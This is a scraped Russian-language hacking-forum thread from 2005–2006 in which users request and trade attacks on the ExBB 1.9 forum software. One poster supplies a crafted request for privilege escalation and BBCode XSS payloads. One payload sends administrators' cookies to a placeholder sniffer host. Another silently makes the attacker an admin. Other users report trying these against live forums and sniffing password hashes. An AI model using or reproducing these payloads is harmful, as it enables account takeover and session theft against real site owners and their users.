Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Вопрос про уязвимости в ExBB 1.9 |
30.12.2005, 23:57
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Вопрос про уязвимости в ExBB 1.9
Какие у него есть Xss ошибки?Или сплойты.Дайте пжл
|
|
|
31.12.2005, 00:44
|
|
Познающий
Регистрация: 28.08.2005
Сообщений: 30
Провел на форуме:
181219
Репутация:
9
|
|
вот тебе линки на видео -
раз
два
было еще, но щас уже его почуму-то нету=( |
|
|
|
31.12.2005, 01:11
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?
|
|
|
|
02.01.2006, 13:15
|
|
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219
Репутация:
-1
|
|
Сообщение от cardons
Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?
хы, чувак, сам себя лолишь...
почти ко всем видосам прилогается тхт файлик со всем что ты видел на экране в блокнотике ...
ыыыыыыыыыыыыы
|
|
|
|
04.01.2006, 02:22
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.
|
|
|
|
04.01.2006, 12:25
|
|
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219
Репутация:
-1
|
|
Сообщение от cardons
Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.
а что ты тз того видео не наешь как сделать???
как из админки сделать себя админом..... хы.... можно скачать себе этот форум и сгенерить этот урл...
но если лень то пжалста...
Код:
setmembers.php?action=edit_user&checkaction=yes&userid=[Пишем сюда ID юзера]&membertitle=&emailaddress=bla@bla.ru&newname=[тут должно быть новое имя]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC
на сколько я помню те КСС-ы у мя не работали чего-то вот ксс который работает
Код:
email]'style='display:none;background:url(javascript:document.images[2].src="[сниффер]?"+document.cookie)[/email]
подправь ксс а то тут его подпортить немнного пришлось чтобы видно было... ну суть думаю понятна
|
|
|
|
28.01.2006, 22:28
|
|
Новичок
Регистрация: 28.01.2006
Сообщений: 3
Провел на форуме:
23336
Репутация:
0
|
|
Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?
|
|
|
|
29.01.2006, 19:25
|
|
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219
Репутация:
-1
|
|
Сообщение от dante
Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?
ну типа надо подождать немножко, пока админ просмотрит сообщение... или если у админа картинки отключены ничего не получится... ну или у админа броузер ОПЕРА... для оперы надо немного переделать КСС...
Код:
[*email]'style=background:url("javascript:document.images[0].src='setmembers.php?action=edit_user&checkaction=yes&userid=[ID]&membertitle=&emailaddress=bla@bla.ru&newname=[ИМЯ]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC'");[/*email]
Вот это проверил -- работает... только свой ID поставь и ИМЯ. и про репу желательно помнить  )
|
|
|
|
30.01.2006, 21:21
|
|
Новичок
Регистрация: 28.01.2006
Сообщений: 3
Провел на форуме:
23336
Репутация:
0
|
|
slime, репу я те плюснул, но что-то непохоже чтоб твоя ксс-ка меня админом сделала... последняя вообще отображается, добавил display:none - перестала, но я эту урлу тестил на нескольких форумах, и что-то пока не админ.. в чем может быть дело, есть какие-то идейки? Может знаешь, где копать? Буду весьма признателен
|
|
|
|
30.01.2006, 23:40
|
|
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821
Репутация:
83
|
|
Парни, извините что в не тему, но вот сейчас проводил xss на ExBB 1.9.1 Снифер прошел хорошо, но дело в том, что хешь интересный, допустим пасс стоит 123456
хешь от него e10adc3949ba59abbe56e057f20f883e а приходит d41d8cd98f00b204e9800998ecf8427e , бред какойто, может кто подскажет, иль стукните в асю.
Я обычно в инвизбл сижу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
